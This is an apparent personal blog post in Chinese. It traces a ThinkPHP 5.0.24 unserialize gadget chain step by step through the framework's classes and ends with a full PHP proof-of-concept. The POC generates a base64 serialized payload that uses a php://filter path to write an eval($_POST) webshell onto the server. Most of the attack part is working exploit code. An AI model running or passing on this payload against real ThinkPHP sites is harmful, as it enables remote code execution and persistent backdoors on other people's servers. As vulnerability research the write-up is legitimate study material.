Thinkphp 5.0.24反序列化文件写
学了也快一年了 头一次去审计经典的框架洞。(反序列化其实一直不是很熟,所以借这次机会希望能更多的增长知识) 其实网上的链子已经非常多了 呜呜 我真的菜
环境搭建
compose一把索 然后发现./think不能执行 那就不执行好了

PHPstorm 配置 xdebug 写个 index 控制器控制下反序列化,就正式开始了
<?php
namespace app\index\controller;
class Index
{
    public function index($ha1c9on='')
    {
        echo "Welcome thinkphp 5.0.24";
        echo ha1c9on;
        unserialize(base64_decode($ha1c9on));
    }
}反序列化寻找
写的详细一点,尽量去自己一步步找到链子 而不是看网上的分析
首先反序列化入手点应该不用多说了__destruct
全局搜了下

一共有四个 跟进thinkphp/library/think/process/pipes/Windows.php下的__destruct 发现其调用了removeFiles方法 

继续跟进

可以发现 这里存在file_exists函数 而这个函数可以调用__toString方法
为什么<code>file_exists函数 可以调用__toString方法file__exists处理的时候会将当作字符串来处理
所以我们全局搜一下__toString

没几个 跟一下 toJson

调用了toArray方法

发现如果类是Model的话 会再次调用 Model类 下的toArray方法
然后发现Model类下也有这个__toString->>toArray 方法
那还挑啥 直接用 model 类就完事了 看看这个toArray 方法干啥了
public function toArray()
{
  $item    = [];
  $visible = [];
  $hidden  = [];
  $data = array_merge($this->data, $this->relation);
  // 过滤属性
  if (!empty($this->visible)) {
    $array = $this->parseAttr($this->visible, $visible);
    $data  = array_intersect_key($data, array_flip($array));
  } elseif (!empty($this->hidden)) {
    $array = $this->parseAttr($this->hidden, $hidden, false);
    $data  = array_diff_key($data, array_flip($array));
  }
  foreach ($data as $key => $val) {
    if ($val instanceof Model || $val instanceof ModelCollection) {
      // 关联模型对象
      $item[$key] = $this->subToArray($val, $visible, $hidden, $key);
    } elseif (is_array($val) && reset($val) instanceof Model) {
      // 关联模型数据集
      $arr = [];
      foreach ($val as $k => $value) {
        $arr[$k] = $this->subToArray($value, $visible, $hidden, $key);
      }
      $item[$key] = $arr;
    } else {
      // 模型属性
      $item[$key] = $this->getAttr($key);
    }
  }
  // 追加属性(必须定义获取器)
  if (!empty($this->append)) {
    foreach ($this->append as $key => $name) {
      if (is_array($name)) {
        // 追加关联对象属性
        $relation   = $this->getAttr($key);
        $item[$key] = $relation->append($name)->toArray();
      } elseif (strpos($name, '.')) {
        list($key, $attr) = explode('.', $name);
        // 追加关联对象属性
        $relation   = $this->getAttr($key);
        $item[$key] = $relation->append([$attr])->toArray();
      } else {
        $relation = Loader::parseName($name, 1, false);
        if (method_exists($this, $relation)) {
          $modelRelation = $this->$relation();
          $value         = $this->getRelationData($modelRelation);
          if (method_exists($modelRelation, 'getBindAttr')) {
            $bindAttr = $modelRelation->getBindAttr();
            if ($bindAttr) {
              foreach ($bindAttr as $key => $attr) {
                $key = is_numeric($key) ? $attr : $key;
                if (isset($this->data[$key])) {
                  throw new Exception('bind attr has exists:' . $key);
                } else {
                  $item[$key] = $value ? $value->getAttr($attr) : null;
                }
              }
              continue;
            }
          }
          $item[$name] = $value;
        } else {
          $item[$name] = $this->getAttr($name);
        }
      }
    }
  }
  return !empty($item) ? $item : [];
}真的长 仔细看看

大概也许似乎估计差不多这三处可以调用__call方法 
这里看最后一个
首先大前提是
if (!empty($this->append))
if (method_exists($this, $relation))
if (method_exists($modelRelation, 'getBindAttr'))
if ($bindAttr)且不满足
if (is_array($name))
elseif (strpos($name, '.'))
if (isset($this->data[$key]))
这里是最难的地方 让我们详细看看怎么办 首先是
$relation 由append控制,要满足其不存在 才会进到if下 之后看最后一个else怎么进,也就是这里

可以发现$value来自getRelationData方法处理$modelRelation后,而$modelRelation是$relation 被Loader::parseName处理之后作为方法名的返回值
跟进Loader::parseName

当type=1时候 进入if 把大写字母中间加上_再转小写,也就是$modelRelation就是一个Model类任意方法的返回值
看看getRelationData怎么处理的$modelRelation   

要求参数是Relation类 所有要找一个可以返回Realtion类对象,经过查找,可以将$modelRelation设为getError

继续看
首先需要进入的是Relation类型的对象,并且要符合这个关键判断
$this->parent && !$modelRelation->isSelfRelation() && get_class($modelRelation->getModel()) == get_class($this->parent) 
才能让$value变成我们想要的东西
首先需要$modelRelation为Relation类型。全局查找getRelation方法且为Relation类型的类,找到了HasOne(/thinkphp/library/think/model/relation/HasOne.php)

然后继续看model下面的if 跟进getBindAttr



直接可控 进入$item[$key] = $value ? $value->getAttr($attr) : null; 
进入__call方法 
全局搜一下call方法
最终漏洞点在这

然后我们跟一下block

跟writeln

然后我们发现handle可控

那就可以全局搜一下write方法
定位到thinkphp/library/think/session/driver/Memcached.php 

依旧handle可控 ,搜set
定位到thinkphp/library/think/cache/driver/File.php

跟进这里的getCacheKey方法 看看文件名是不是可控 

$filename = $this->options['path'] . $name . '.php'; options可控 文件名可控 然后看看content
跟进
if ($result) {
  isset($first) && $this->setTagItem($filename);
  clearstatcache();
  return true;
} else {
  return false;
}中setTagItem

发现value的值就为传进来的filename 又调用了一次set,且此处两个参数都是可控的
所以可以在文件名处搞事情,通过编码然后将文件名写入shell中 所以成功写入shell
总结流程
thinkphp/library/think/process/pipes/Windows.php  中<strong>destruct()的$this->removeFiles();触发</strong>toString
thinkphp/library/think/Model.php中__toString  -> toJson -> toArray
toArray方法中$relation 由append控制,要求参数是Relation类 所有要找一个可以返回Realtion类对象,经过查找,可以将$modelRelation设为getError
继续跟进getRelationData首先需要进入的是Relation类型的对象,并且要符合这个关键判断
$this->parent && !$modelRelation->isSelfRelation() && get_class($modelRelation->getModel()) == get_class($this->parent) 
才能让$value变成我们想要的东西,需要$modelRelation为Relation类型。全局查找getRelation方法且为Relation类型的类,找到了HasOne(/thinkphp/library/think/model/relation/HasOne.php)
跟进$bindAttr = $modelRelation->getBindAttr(); 中的getBindAttr(),BindAttr可控 进入
__call方法
thinkphp/library/think/console/Output.php 中__call中跟进block  -> writeln -> write -> handle可控
thinkphp/library/think/session/driver/Memcache.php中write方法handle可控 调用set
thinkphp/library/think/cache/driver/File.php中set方法filename->getCacheKey中options可控  文件内容写入成功后 会调用 setTagItem方法 其中$name可控 再次调用set方法 可以在文件名处使用伪协议编码写入shell 
POC
<?php
namespace think\process\pipes {
    class Windows {
        private $files = [];
        public function __construct($files)
        {
            $this->files = [$files]; //$file => /think/Model的子类new Pivot(); Model是抽象类
        }
    }
}
namespace think {
    abstract class Model{
        protected $append = [];
        protected $error = null;
        public $parent;
        function __construct($output, $modelRelation)
        {
            $this->parent = $output;  //$this->parent=> think\console\Output;
            $this->append = array("xxx"=>"getError");     //调用getError 返回this->error
            $this->error = $modelRelation;               // $this->error 要为 relation类的子类,并且也是OnetoOne类的子类==>>HasOne
        }
    }
}
namespace think\model{
    use think\Model;
    class Pivot extends Model{
        function __construct($output, $modelRelation)
        {
            parent::__construct($output, $modelRelation);
        }
    }
}
namespace think\model\relation{
    class HasOne extends OneToOne {
    }
}
namespace think\model\relation {
    abstract class OneToOne
    {
        protected $selfRelation;
        protected $bindAttr = [];
        protected $query;
        function __construct($query)
        {
            $this->selfRelation = 0;
            $this->query = $query;    //$query指向Query
            $this->bindAttr = ['xxx'];// $value值,作为call函数引用的第二变量
        }
    }
}
namespace think\db {
    class Query {
        protected $model;
        function __construct($model)
        {
            $this->model = $model; //$this->model=> think\console\Output;
        }
    }
}
namespace think\console{
    class Output{
        private $handle;
        protected $styles;
        function __construct($handle)
        {
            $this->styles = ['getAttr'];
            $this->handle =$handle; //$handle->think\session\driver\Memcached
        }
    }
}
namespace think\session\driver {
    class Memcached
    {
        protected $handler;
        function __construct($handle)
        {
            $this->handler = $handle; //$handle->think\cache\driver\File
        }
    }
}
namespace think\cache\driver {
    class File
    {
        protected $options=null;
        protected $tag;
        function __construct(){
            $this->options=[
                'expire' => 3600,
                'cache_subdir' => false,
                'prefix' => '',
                'path'  => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../a.php',
                'data_compress' => false,
            ];
            $this->tag = 'xxx';
        }
    }
}
namespace {
    $Memcached = new think\session\driver\Memcached(new \think\cache\driver\File());
    $Output = new think\console\Output($Memcached);
    $model = new think\db\Query($Output);
    $HasOne = new think\model\relation\HasOne($model);
    $window = new think\process\pipes\Windows(new think\model\Pivot($Output,$HasOne));
    //echo serialize($window);
    echo base64_encode(serialize($window));
}